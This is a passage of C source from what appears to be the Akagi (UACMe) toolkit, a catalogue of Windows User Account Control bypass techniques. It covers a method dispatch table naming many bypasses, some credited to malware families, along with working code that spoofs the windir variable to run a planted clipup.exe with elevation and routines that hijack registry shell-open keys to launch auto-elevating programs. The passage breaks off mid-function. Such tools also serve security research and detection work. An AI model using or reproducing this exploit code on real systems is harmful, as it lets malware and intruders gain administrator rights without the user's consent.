PayloadFinal = supHeapAlloc(Size);
if (PayloadFinal) {
_strcpy(PayloadFinal, g_ctx->szSystemDirectory);
_strcat(PayloadFinal, CMD_EXE);
_strcat(PayloadFinal, RUN_CMD_COMMAND);
_strcat(PayloadFinal, PayloadParameter);
Result = ucmMsStoreProtocolMethod(PayloadFinal);
supHeapFree(PayloadFinal);
}
break;
}
return Result;
}
UCM_API(MethodPca)
{
#ifndef _WIN64
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#else
return ucmPcaMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
#endif
}
UCM_API(MethodCurVer)
{
UNREFERENCED_PARAMETER(Parameter);
#ifndef _WIN64
return STATUS_NOT_SUPPORTED;
#else
LPWSTR lpszPayload = NULL;
LPWSTR lpszTargetApp = NULL;
WCHAR szTargetApp[MAX_PATH * 2];
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
lpszTargetApp = FODHELPER_EXE;
_strcpy(szTargetApp, g_ctx->szSystemDirectory);
_strcat(szTargetApp, lpszTargetApp);
return ucmShellRegModMethod3(T_MSSETTINGS,
szTargetApp,
lpszPayload);
#endif
}
UCM_API(MethodMsdt)
{
return ucmMsdtMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodDotNetSerial)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Parameter);
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
return ucmDotNetSerialMethod(lpszPayload);
}
UCM_API(MethodVFServerTaskSched)
{
return ucmVFServerTaskSchedMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodVFServerDiagProf)
{
return ucmVFServerDiagProfileMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodIscsiCpl)
{
return ucmIscsiCplMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
UCM_API(MethodAtlHijack)
{
#ifdef _WIN64
return ucmAtlHijackMethod(MMC_EXE,
ATL_DLL,
Parameter->PayloadCode,
Parameter->PayloadSize);
#else
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#endif
}
UCM_API(MethodSspiDatagram)
{
#ifdef _WIN64
return ucmSspiDatagramMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
#else
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#endif
}
UCM_API(MethodRequestTrace)
{
#ifdef _WIN64
return ucmRequestTraceMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
#else
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#endif
}
UCM_API(MethodQuickAssist)
{
#ifdef _WIN64
return ucmQuickAssistMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
#else
UNREFERENCED_PARAMETER(Parameter);
return STATUS_NOT_SUPPORTED;
#endif
}
================================================
FILE: Source/Akagi/methods/methods.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: METHODS.H
*
* VERSION: 3.68
*
* DATE: 07 Mar 2025
*
* Prototypes and definitions for UAC bypass methods table.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef enum _UCM_METHOD {
UacMethodTest = 0, //+
UacMethodSysprep1 = 1,
UacMethodSysprep2,
UacMethodOobe,
UacMethodRedirectExe,
UacMethodSimda,
UacMethodCarberp1,
UacMethodCarberp2,
UacMethodTilon,
UacMethodAVrf,
UacMethodWinsat,
UacMethodShimPatch,
UacMethodSysprep3,
UacMethodMMC1,
UacMethodSirefef,
UacMethodGeneric,
UacMethodGWX,
UacMethodSysprep4,
UacMethodManifest,
UacMethodInetMgr,
UacMethodMMC2,
UacMethodSXS,
UacMethodSXSConsent, //+
UacMethodDISM, //+
UacMethodComet,
UacMethodEnigma0x3,
UacMethodEnigma0x3_2,
UacMethodExpLife,
UacMethodSandworm,
UacMethodEnigma0x3_3,
UacMethodWow64Logger, //+
UacMethodEnigma0x3_4,
UacMethodUiAccess, //+
UacMethodMsSettings, //+
UacMethodDiskSilentCleanup, //+
UacMethodTokenMod,
UacMethodJunction, //+
UacMethodSXSDccw, //+
UacMethodHakril, //+
UacMethodCorProfiler, //+
UacMethodCOMHandlers,
UacMethodCMLuaUtil, //+
UacMethodFwCplLua,
UacMethodDccwCOM, //+
UacMethodVolatileEnv,
UacMethodSluiHijack,
UacMethodBitlockerRC,
UacMethodCOMHandlers2,
UacMethodSPPLUAObject,
UacMethodCreateNewLink,
UacMethodDateTimeWriter,
UacMethodAcCplAdmin,
UacMethodDirectoryMock, //+
UacMethodShellSdclt, //+
UacMethodEgre55,
UacMethodTokenModUiAccess, //+
UacMethodShellWSReset,
UacMethodSysprep5,
UacMethodEditionUpgradeMgr, //+
UacMethodDebugObject, //+
UacMethodGlupteba,
UacMethodShellChangePk, //+
UacMethodMsSettings2, //+
UacMethodNICPoison, //+
UacMethodIeAddOnInstall, //+
UacMethodWscActionProtocol, //+
UacMethodFwCplLua2, //+
UacMethodMsSettingsProtocol,//+
UacMethodMsStoreProtocol, //+
UacMethodPca, //+
UacMethodCurVer, //+
UacMethodNICPoison2, //+
UacMethodMsdt, //+
UacMethodDotNetSerial, //+
UacMethodVFServerTaskSched, //+
UacMethodVFServerDiagProf, //+
UacMethodIscsiCpl, //+
UacMethodAtlHijack, //+
UacMethodSspiDatagram, //+
UacMethodTokenModUiAccess2, //+
UacMethodRequestTrace, //+
UacMethodQuickAssist, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;
#define UCM_DISPATCH_ENTRY_MAX UacMethodMax
typedef struct _UCM_METHOD_AVAILABILITY {
ULONG MinumumWindowsBuildRequired; //if the current build less this value this method is not working here
ULONG MinimumExpectedFixedWindowsBuild; //if the current build equal or greater this value this method is not working here or fixed
} UCM_METHOD_AVAILABILITY;
typedef struct tagUCM_PARAMS_BLOCK {
UCM_METHOD Method;
PVOID PayloadCode;
ULONG PayloadSize;
} UCM_PARAMS_BLOCK, *PUCM_PARAMS_BLOCK;
typedef NTSTATUS(CALLBACK *PUCM_API_ROUTINE)(
_In_ PUCM_PARAMS_BLOCK Parameter
);
#define UCM_API(n) NTSTATUS CALLBACK n( \
_In_ PUCM_PARAMS_BLOCK Parameter)
typedef struct _UCM_API_DISPATCH_ENTRY {
PUCM_API_ROUTINE Routine; //method to execute
UCM_METHOD_AVAILABILITY Availability; //min and max supported Windows builds
ULONG PayloadResourceId; //which payload dll must be used
BOOL Win32OrWow64Required;
BOOL DisallowWow64;
BOOL SetParameters; //need shared parameters to be set
} UCM_API_DISPATCH_ENTRY, *PUCM_API_DISPATCH_ENTRY;
#include "elvint.h"
#include "routines.h"
#include "comsup.h"
#include "tests\test.h"
NTSTATUS MethodsManagerCall(
_In_ UCM_METHOD Method);
================================================
FILE: Source/Akagi/methods/rinn.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2025
*
* TITLE: RINN.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* FBK UAC bypass methods.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmEditionUpgradeManagerMethod
*
* Purpose:
*
* Bypass UAC using EditionUpgradeManager autoelevated interface.
* This function expects that supMasqueradeProcess was called on process initialization.
*
* EditionUpgradeManager has method called AcquireModernLicenseWithPreviousId.
* During it execution MS code starts Clipup.exe process from (what it suppose) windows system32 folder.
* However since MS programmers always lazy and banned in their own documentation it uses
* environment variable "windir" to expand Windows directory instead of using something like GetSystemDirectory.
* This giving us opportunity (hello Nadela) to spoof current user environment variable for requested DllHost.exe
* thus turning their code launch our clipup.exe from our controlled location.
*
*/
NTSTATUS ucmEditionUpgradeManagerMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
BOOL bEnvSet = FALSE;
HRESULT hr_init;
IEditionUpgradeManager *Manager = NULL;
DWORD Data[3];
LPOLESTR lpGuidDir = NULL;
LPWSTR lpPath = NULL;
LPWSTR stringPtr = NULL;
SIZE_T nLen;
GUID guidTemp;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
if (CoCreateGuid(&guidTemp) != S_OK)
break;
if (StringFromCLSID(&guidTemp, &lpGuidDir) != S_OK)
break;
nLen = (1 + _strlen(lpGuidDir) + (MAX_PATH * 2)) * sizeof(WCHAR);
lpPath = (LPWSTR)supHeapAlloc(nLen);
if (lpPath == NULL)
break;
//
// Replace default Fubuki dll entry point with new and remove dll flag.
//
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
FUBUKI_DEFAULT_ENTRYPOINT,
TRUE))
{
break;
}
//
// Create %temp%\{GUID} directory.
//
_strcpy(lpPath, g_ctx->szTempDirectory);
stringPtr = _strcat(lpPath, lpGuidDir);
if (!CreateDirectory(lpPath, NULL))
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
//
// Set controlled environment variable.
//
bEnvSet = supSetEnvVariable(FALSE,
NULL,
T_WINDIR,
lpPath);
if (!bEnvSet)
break;
//
// Create %temp%\{GUID}\system32 directory.
//
_strcat(lpPath, SYSTEM32_DIR);
if (!CreateDirectory(lpPath, NULL))
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
//
// Drop payload to %temp%\system32 as clipup.exe and run target interface.
//
_strcat(lpPath, CLIPUP_EXE);
if (supWriteBufferToFile(lpPath, ProxyDll, ProxyDllSize)) {
if (FAILED(ucmAllocateElevatedObject(T_CLSID_EditionUpgradeManager,
&IID_EditionUpgradeManager,
CLSCTX_LOCAL_SERVER,
&Manager)))
{
break;
}
if (Manager == NULL) {
break;
}
Data[0] = 'f';
Data[1] = 'f';
Data[2] = 0;
Manager->lpVtbl->AcquireModernLicenseWithPreviousId(Manager,
MYSTERIOUSCUTETHING, (PDWORD)&Data);
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
if (Manager)
Manager->lpVtbl->Release(Manager);
//
// Cleanup section.
//
// 1. Remove variable.
// 2. Remove payload file.
// 3. Remove fake directories.
//
if (bEnvSet)
supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);
CoTaskMemFree(lpGuidDir);
supWaitForGlobalCompletionEvent();
if (lpPath) {
if (stringPtr) {
DeleteFile(lpPath);
*stringPtr = 0;
_strcat(lpPath, SYSTEM32_DIR);
RemoveDirectory(lpPath);
*stringPtr = 0;
RemoveDirectory(lpPath);
}
supHeapFree(lpPath);
}
if (hr_init == S_OK)
CoUninitialize();
return MethodResult;
}
================================================
FILE: Source/Akagi/methods/routines.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: ROUTINES.H
*
* VERSION: 3.68
*
* DATE: 07 Mar 2025
*
* Prototypes of methods for UAC bypass methods table.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
NTSTATUS ucmGenericAutoelevationEx(
_In_opt_ LPCWSTR lpTargetApp,
_In_ LPCWSTR lpTargetDll,
_In_opt_ LPCWSTR lpParameters,
_In_opt_ LPCWSTR lpSubDirectory,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmGenericAutoelevation(
_In_opt_ LPCWSTR lpTargetApp,
_In_ LPCWSTR lpTargetDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmShellRegModMethod(
_In_ UCM_METHOD Method,
LPCWSTR lpTargetKey,
LPCWSTR lpszTargetApp,
LPCWSTR lpszPayload);
NTSTATUS ucmShellRegModMethod2(
_In_ UCM_METHOD Method,
LPCWSTR lpTargetKey,
LPCWSTR lpszTargetApp,
LPCWSTR lpszPayload);
NTSTATUS ucmShellRegModMethod3(
LPCWSTR lpTargetKey,
LPCWSTR lpszTargetApp,
LPCWSTR lpszPayload);
NTSTATUS ucmCMLuaUtilShellExecMethod(
_In_ LPWSTR lpszExecutable);
NTSTATUS ucmNICPoisonMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmNICPoisonMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmIeAddOnInstallMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmWscActionProtocolMethod(
_In_ LPCWSTR lpszPayload);
NTSTATUS ucmFwCplLuaMethod2(
_In_ LPCWSTR lpszPayload);
NTSTATUS ucmMsSettingsProtocolMethod(
_In_ LPCWSTR lpszPayload);
NTSTATUS ucmMsStoreProtocolMethod(
_In_ LPCWSTR lpszPayload);
NTSTATUS ucmPcaMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmDirectoryMockMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmHakrilMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmSXSMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize,
_In_opt_ LPWSTR lpTargetDirectory,
_In_ LPWSTR lpTargetApplication,
_In_opt_ LPWSTR lpLaunchApplication,
_In_ BOOL bConsentItself);
NTSTATUS ucmDismMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmWow64LoggerMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmUiAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmSXSDccwMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmCorProfilerMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmDccwCOMMethod(
_In_ LPWSTR lpszPayload);
NTSTATUS ucmJunctionMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmMsdtMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmIscsiCplMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmDotNetSerialMethod(
_In_ LPWSTR lpszPayload);
NTSTATUS ucmEditionUpgradeManagerMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmDiskCleanupEnvironmentVariable(
_In_ LPWSTR lpszPayload);
NTSTATUS ucmTokenModUIAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmTokenModUIAccessMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmDebugObjectMethod(
_In_ LPWSTR lpszPayload);
NTSTATUS ucmVFServerTaskSchedMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmVFServerDiagProfileMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
BOOL ucmCreateCabinetForSingleFile(
_In_ LPWSTR lpSourceDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize,
_In_opt_ LPWSTR lpInternalName);
BOOL ucmWusaExtractViaJunction(
_In_ LPWSTR lpTargetDirectory);
NTSTATUS ucmAtlHijackMethod(
_In_opt_ LPCWSTR lpTargetApp,
_In_ LPCWSTR lpTargetDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmSspiDatagramMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmRequestTraceMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
NTSTATUS ucmQuickAssistMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
//
// Post execution cleanup routines.
//
BOOL ucmMethodCleanupSingleItemSystem32(
_In_ LPCWSTR lpItemName,
_In_opt_ LPCWSTR lpSubDirectory);
BOOL ucmJunctionMethodCleanup(
VOID);
BOOL ucmSXSDccwMethodCleanup(
VOID);
BOOL ucmSXSMethodCleanup(
VOID);
VOID ucmDismMethodCleanup(
VOID);
BOOL ucmHakrilMethodCleanup(
VOID);
VOID ucmWusaCabinetCleanup(
VOID);
VOID ucmIscsiCplMethodCleanup(
VOID);
================================================
FILE: Source/Akagi/methods/shellsup.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2023
*
* TITLE: SHELLSUP.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* Shell registry hijack autoelevation methods.
*
* Used by various malware.
*
* For description please visit original URL
* https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
* https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
* https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
* https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
* https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
* http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass
* https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html
* https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html
* https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmxSetSlaveParams
*
* Purpose:
*
* Set slave key parameters.
*
*/
NTSTATUS ucmxSetSlaveParams(
_In_ HANDLE KeyHandle,
_In_ LPCWSTR Payload
)
{
NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
SIZE_T sz;
DWORD cbData, dummy;
dummy = 0;
cbData = 0;
ntStatus = supRegWriteValue(KeyHandle,
T_DELEGATEEXECUTE,
REG_SZ,
&dummy,
cbData);
if (NT_SUCCESS(ntStatus)) {
//
// Set "Default" value as our payload.
//
sz = (1 + _strlen(Payload)) * sizeof(WCHAR);
ntStatus = supRegWriteValue(KeyHandle,
NULL,
REG_SZ,
(PVOID)Payload,
(ULONG)sz);
}
return ntStatus;
}
/*
* ucmxCreateSlaveKey
*
* Purpose:
*
* Create temporary key with all required values.
*
*/
NTSTATUS ucmxCreateSlaveKey(
_In_ HANDLE RootKey,
_In_ LPCWSTR Payload,
_Inout_ LPWSTR SlaveKey //cch max MAX_PATH
)
{
NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
GUID guidTemp;
LPWSTR lpGuidKey = NULL;
HKEY hKey;
SIZE_T sz;
do {
if (CoCreateGuid(&guidTemp) != S_OK)
break;
if (StringFromCLSID(&guidTemp, &lpGuidKey) != S_OK)
break;
sz = (1 + _strlen(lpGuidKey)) * sizeof(WCHAR);
_strncpy(SlaveKey, MAX_PATH, lpGuidKey, MAX_PATH);
//
// Slave key with data.
//
if (ERROR_SUCCESS == RegCreateKey(RootKey,
lpGuidKey,
&hKey))
{
ntStatus = ucmxSetSlaveParams(hKey, Payload);
RegCloseKey(hKey);
}
} while (FALSE);
CoTaskMemFree(lpGuidKey);
return ntStatus;
}
/*
* ucmShellRegModMethod
*
* Purpose:
*
* Bypass UAC using various registry shell key modifications.
*
*/
NTSTATUS ucmShellRegModMethod(
_In_ UCM_METHOD Method,
LPCWSTR lpTargetKey,
LPCWSTR lpszTargetApp,
LPCWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
BOOLEAN bSlaveCreated = FALSE;
NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
HANDLE masterRootKey = NULL, classesKey = NULL, targetKey = NULL;
OBJECT_ATTRIBUTES obja;
UNICODE_STRING usCurrentUser, usMasterKey, usSlaveKey;
WCHAR szSlaveKey[MAX_PATH * 2];
WCHAR szMasterKey[MAX_PATH * 2];
WCHAR szClasses[MAX_PATH];
WCHAR szBuffer[MAX_PATH * 2];
SHELLEXECUTEINFO shinfo;
LPWSTR lpSlaveNtKey = NULL;
DWORD dummy;
SIZE_T sz;
UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L"SymbolicLinkValue");
HRESULT hr_init;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
RtlSecureZeroMemory(&szSlaveKey, sizeof(szSlaveKey));
#ifndef _WIN64
if (g_ctx->IsWow64) {
ntStatus = supEnableDisableWow64Redirection(TRUE);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
}
#endif
do {
//
// Remember current user reg name.
//
ntStatus = RtlFormatCurrentUserKeyPath(&usCurrentUser);
if (!NT_SUCCESS(ntStatus))
break;
//
// Open classes root.
//
ntStatus = supOpenClassesKey(&usCurrentUser, &classesKey);
if (!NT_SUCCESS(ntStatus))
break;
//
// Create slave key.
//
szSlaveKey[0] = L'\\';
szSlaveKey[1] = 0;
ntStatus = ucmxCreateSlaveKey(
classesKey,
lpszPayload,
&szSlaveKey[1]);
if (!NT_SUCCESS(ntStatus))
break;
bSlaveCreated = TRUE;
//
// Allocate slave NT regpath.
//
sz = (MAX_PATH + _strlen(szSlaveKey) * sizeof(WCHAR)) +
usCurrentUser.MaximumLength;
lpSlaveNtKey = (PWSTR)supHeapAlloc(sz);
if (lpSlaveNtKey == NULL)
break;
RtlInitEmptyUnicodeString(&usSlaveKey, lpSlaveNtKey, sz);
ntStatus = RtlAppendUnicodeStringToString(&usSlaveKey, &usCurrentUser);
if (!NT_SUCCESS(ntStatus))
break;
szClasses[0] = L'\\';
szClasses[1] = 0;
_strcpy(&szClasses[1], T_SOFTWARE_CLASSES);
ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szClasses);
if (!NT_SUCCESS(ntStatus))
break;
ntStatus = RtlAppendUnicodeToString(&usSlaveKey, szSlaveKey);
if (!NT_SUCCESS(ntStatus))
break;
//
// Create empty master key.
//
_strncpy(szMasterKey, MAX_PATH, lpTargetKey, MAX_PATH);
_strcat(szMasterKey, T_SHELL_OPEN);
if (ERROR_SUCCESS != RegCreateKeyEx(classesKey,
szMasterKey,
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
(HKEY*)&masterRootKey,
NULL))
{
break;
}
//
// Open/create master key.
//
RtlInitUnicodeString(&usMasterKey, T_SHELL_COMMAND);
InitializeObjectAttributes(&obja, &usMasterKey, OBJ_CASE_INSENSITIVE, masterRootKey, NULL);
ntStatus = NtCreateKey(&targetKey,
KEY_ALL_ACCESS,
&obja, 0, NULL,
REG_OPTION_CREATE_LINK | REG_OPTION_VOLATILE,
&dummy);
//
// If link already created, update it.
//
if (ntStatus == STATUS_OBJECT_NAME_COLLISION) {
obja.Attributes |= OBJ_OPENLINK;
ntStatus = NtOpenKey(&targetKey,
KEY_ALL_ACCESS,
&obja);
}
if (!NT_SUCCESS(ntStatus))
break;
sz = _strlen(usSlaveKey.Buffer) * sizeof(WCHAR);
ntStatus = NtSetValueKey(targetKey,
&CmSymbolicLinkValue,
0,
REG_LINK,
(PVOID)usSlaveKey.Buffer,
(ULONG)usSlaveKey.Length);
if (!NT_SUCCESS(ntStatus))
break;
NtClose(targetKey);
targetKey = NULL;
if ((Method == UacMethodShellChangePk) || (Method == UacMethodShellSdclt)) {
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, lpszTargetApp);
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.lpVerb = RUNAS_VERB;
shinfo.lpFile = szBuffer;
shinfo.nShow = SW_SHOWNORMAL;
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
if (ShellExecuteEx(&shinfo)) {
Sleep(5000);
TerminateProcess(shinfo.hProcess, 0);
CloseHandle(shinfo.hProcess);
MethodResult = STATUS_SUCCESS;
}
}
else {
if (supRunProcess(lpszTargetApp, NULL))
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
if (targetKey) NtClose(targetKey);
if (masterRootKey) NtClose(masterRootKey);
if (lpSlaveNtKey) supHeapFree(lpSlaveNtKey);
//
// Cleanup slave key.
//
if (bSlaveCreated) {
if (classesKey) {
RegDeleteKey(classesKey, &szSlaveKey[1]);//skip slash
}
}
if (classesKey)
NtClose(classesKey);
if (SUCCEEDED(hr_init)) CoUninitialize();
//
// Remove symlink.
//
szMasterKey[0] = L'\\';
szMasterKey[1] = 0;
_strcpy(&szMasterKey[1], T_SOFTWARE_CLASSES);
_strcat(szMasterKey, TEXT("\\"));
_strcat(szMasterKey, lpTargetKey);
_strcat(szMasterKey, T_SHELL_OPEN);
_strcat(szMasterKey, TEXT("\\"));
_strcat(szMasterKey, T_SHELL_COMMAND);
supRemoveRegLinkHKCU(szMasterKey);
#ifndef _WIN64
if (g_ctx->IsWow64) {
supEnableDisableWow64Redirection(FALSE);
}
#endif
return MethodResult;
}
/*
* ucmShellRegModMethod2
*
* Purpose:
*
* Bypass UAC using various registry shell key modifications.
*
*/
NTSTATUS ucmShellRegModMethod2(
_In_ UCM_METHOD Method,
LPCWSTR lpTargetKey,
LPCWSTR lpszTargetApp,
LPCWSTR lpszPayload
)
{
BOOLEAN bBackupAvailable = FALSE;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;
HANDLE hClassesRoot, hSubKey = NULL;
DWORD dwDisp = 0;
WCHAR szKey[MAX_PATH];
PWSTR pwszKey;
UNREFERENCED_PARAMETER(Method);
#ifndef _WIN64
if (g_ctx->IsWow64) {
ntStatus = supEnableDisableWow64Redirection(TRUE);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
}
#endif
do {
ntStatus = supOpenClassesKey(NULL, &hClassesRoot);
if (!NT_SUCCESS(ntStatus))
break;
RtlSecureZeroMemory(&szKey, sizeof(szKey));
_strcpy(szKey, lpTargetKey);
_strcat(szKey, T_SHELL_OPEN);
_strcat(szKey, TEXT("\\"));
_strcat(szKey, T_SHELL_COMMAND);
//
// If "command" key exist - backup it.
//
if (ERROR_SUCCESS == RegOpenKeyEx(hClassesRoot,
szKey,
0,
MAXIMUM_ALLOWED,
(HKEY*)&hSubKey))
{
RegCloseKey(hSubKey);
bBackupAvailable = (RegRenameKey(hClassesRoot,
szKey,
MYSTERIOUSCUTETHING) == ERROR_SUCCESS);
}
_strcat(szKey, TEXT("~"));
hSubKey = NULL;
if (ERROR_SUCCESS != RegCreateKeyEx(hClassesRoot,
szKey,
0,
NULL,
REG_OPTION_NON_VOLATILE,
MAXIMUM_ALLOWED,
NULL,
(HKEY*)&hSubKey,
&dwDisp))
{
break;
}
ntStatus = ucmxSetSlaveParams(hSubKey, lpszPayload);
if (!NT_SUCCESS(ntStatus))
break;
RegCloseKey(hSubKey);
hSubKey = NULL;
RegRenameKey(hClassesRoot, szKey, T_SHELL_COMMAND);
if (supRunProcess(lpszTargetApp, NULL))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (hSubKey) RegCloseKey(hSubKey);
//
// Cleanup section.
//
_strcpy(szKey, lpTargetKey);
_strcat(szKey, T_SHELL_OPEN);
_strcat(szKey, TEXT("\\"));
if (bBackupAvailable) {
pwszKey = _strend(szKey);
_strcat(szKey, T_SHELL_COMMAND);
RegDeleteKey(hClassesRoot, szKey);
*pwszKey = 0;
_strcat(szKey, MYSTERIOUSCUTETHING);
RegRenameKey(hClassesRoot,
szKey,
T_SHELL_COMMAND);
}
else {
_strcat(szKey, T_SHELL_COMMAND);
RegDeleteKey(hClassesRoot, szKey);
}
if (hClassesRoot) NtClose(hClassesRoot);
#ifndef _WIN64
if (g_ctx->IsWow64) {
supEnableDisableWow64Redirection(FALSE);
}
#endif
return MethodResult;
}
/*
* ucmShellRegModMethod3
*
* Purpose:
*
* Bypass UAC using registry shell key CurVer progId.
*
*/
NTSTATUS ucmShellRegModMethod3(
LPCWSTR lpTargetKey,
LPCWSTR lpszTargetApp,
LPCWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HANDLE hClassesRoot, hSubKey = NULL;
SIZE_T sz;
WCHAR szKey[MAX_PATH];
#ifndef _WIN64
if (g_ctx->IsWow64) {
MethodResult = supEnableDisableWow64Redirection(TRUE);
if (!NT_SUCCESS(MethodResult))
return MethodResult;
}
#endif
do {
MethodResult = supOpenClassesKey(NULL, &hClassesRoot);
if (!NT_SUCCESS(MethodResult))
break;
RtlSecureZeroMemory(&szKey, sizeof(szKey));
//
// Prepare registry key for a new handler.
//
